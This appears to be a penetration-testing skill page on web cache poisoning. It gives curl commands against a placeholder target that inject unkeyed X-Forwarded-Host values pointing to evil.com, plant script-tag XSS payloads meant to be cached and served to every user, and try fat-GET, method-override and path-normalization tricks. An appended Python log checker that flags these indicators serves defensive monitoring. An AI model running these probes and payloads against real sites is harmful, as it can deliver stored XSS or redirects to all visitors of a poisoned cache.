attack-cache-poison
Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
| field | value |
|---|---|
| name | attack-cache-poison |
| description | Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["cache-poisoning","web","xss","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-444","CWE-525"] |
| chains_with | ["attack-host-header","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-host-header":"Host header + cache = stored XSS/redirect affecting all users"} |
Inject malicious content into cached responses via unkeyed inputs (headers, parameters) so that subsequent users receive the poisoned response.
```bash
# Check cache headers
curl -s -D- https://TARGET/ | grep -i "x-cache\|age\|cache-control\|cf-cache\|x-varnish"
# Identify cache key components (Vary header)
curl -s -D- https://TARGET/ | grep -i "vary"
```
Test headers that are reflected in the response but are NOT part of the cache key:
```bash
# X-Forwarded-Host
curl -s https://TARGET/ -H "X-Forwarded-Host: evil.com" | grep "evil.com"
# X-Forwarded-Scheme
curl -s https://TARGET/ -H "X-Forwarded-Scheme: nothttps" | grep "redirect"
# X-Original-URL / X-Rewrite-URL
curl -s https://TARGET/ -H "X-Original-URL: /admin"
# Custom headers
curl -s https://TARGET/ -H "X-Forwarded-Port: 1234"
# Poison with XSS payload
curl -s https://TARGET/ \
  -H "X-Forwarded-Host: evil.com\"><script>alert(1)</script>"
# Wait for cache to store, then verify
curl -s https://TARGET/ | grep "alert(1)"
```
```bash
# Find parameters not in cache key (cache-buster should not change x-cache status)
curl -s "https://TARGET/?cb=123" -D- | grep -i "x-cache"
curl -s "https://TARGET/?utm_source=evil" | grep "evil"
# Reflected unkeyed parameter → stored XSS
curl -s "https://TARGET/?evil=<script>alert(1)</script>"
# Fat GET — body in GET request
curl -s https://TARGET/ -X GET -d "param=<script>alert(1)</script>"
# POST → GET cache confusion
curl -s https://TARGET/ -X POST \
  -H "X-HTTP-Method-Override: GET" \
  -d "param=evil"
# Path normalization differences (--path-as-is stops curl from collapsing "..")
curl -s --path-as-is "https://TARGET/path/../admin"
# Case handling: compare the two responses
curl -s "https://TARGET/PATH"
curl -s "https://TARGET/path"
curl -s "https://TARGET/path;.js"
```
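On the defensive side, as an added example that is not part of this skill page: a Python checker over constructed edge-access-log events that flags the same indicators the probes above leave behind (unkeyed X-Forwarded-*/X-Original-URL/X-Rewrite-URL/X-HTTP-Method-Override headers, markup in them or in the query, fat GETs, and path-normalization tricks) so they surface as alerts at the cache tier. It assumes a JSON-lines log with a parsed headers object, captured on the public-facing side of the edge before any trusted proxy adds its own X-Forwarded-* headers.

```python
import json
import re
from urllib.parse import unquote

# Request headers that origins act on but caches rarely key on (all probed above);
# a browser never sends them, so they should not arrive from the public side of the edge.
WATCH_HEADERS = {"x-forwarded-host", "x-forwarded-scheme", "x-forwarded-port",
                 "x-original-url", "x-rewrite-url", "x-http-method-override"}
MARKUP = re.compile(r"[<>\"']")  # no place in a hostname, scheme, port or path

def classify(event: dict) -> list[str]:
    """Return the cache-poisoning indicators present in one access-log event."""
    findings = []
    headers = {k.lower(): v for k, v in event.get("headers", {}).items()}
    for name in sorted(WATCH_HEADERS & set(headers)):
        findings.append(f"unkeyed-header:{name}")
        if MARKUP.search(unquote(headers[name])):
            findings.append(f"markup-in-header:{name}")
    if MARKUP.search(unquote(event.get("query", ""))):
        findings.append("markup-in-query")  # candidate reflected, unkeyed parameter
    if event.get("method") == "GET" and int(event.get("body_bytes", 0)) > 0:
        findings.append("body-on-get")  # "fat GET": a body the cache key ignores
    path = unquote(event.get("path", "/"))
    if "/../" in path or ";" in path:
        findings.append("path-normalization")  # cache and origin may parse it differently
    return findings

def scan_log(lines):
    """Yield (client, path, findings) for each JSON-lines event that carries an indicator."""
    for line in lines:
        event = json.loads(line)
        hits = classify(event)
        if hits:
            yield event["client"], event["path"], hits

# Constructed sample events; JSON lines with a parsed "headers" object is an assumed log shape.
SAMPLE_LOG = [
    '{"client":"203.0.113.5","method":"GET","path":"/","headers":{"Host":"app.example",'
    '"X-Forwarded-Host":"evil.com\\"><script>alert(1)</script>"}}',
    '{"client":"198.51.100.7","method":"GET","path":"/","query":"page=2","headers":{"Host":"app.example"}}',
    '{"client":"203.0.113.5","method":"GET","path":"/","query":"cb=123","headers":{"Host":"app.example"},"body_bytes":38}',
    '{"client":"203.0.113.5","method":"GET","path":"/path/../admin","headers":{"Host":"app.example"}}',
    '{"client":"203.0.113.5","method":"POST","path":"/","headers":{"Host":"app.example","X-HTTP-Method-Override":"GET"}}',
]

if __name__ == "__main__":
    for client, path, hits in scan_log(SAMPLE_LOG):
        print(client, path, ", ".join(hits))
```

The ordinary request (page=2, no watched headers) produces no finding, so a clean log yields no alerts; legitimate X-Forwarded-* values from an upstream proxy would trip `unkeyed-header` only if the log is taken behind that proxy, which is why the capture point matters.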
| Finding | Severity |
|---|---|
| Cached XSS payload served to other users | Critical (P1) |
| Cached redirect to attacker domain | High (P2) |
| Denial of service via cache poisoning (error page cached) | Medium (P3) |
| Unkeyed header reflected (no cache impact proven) | Low (P4) |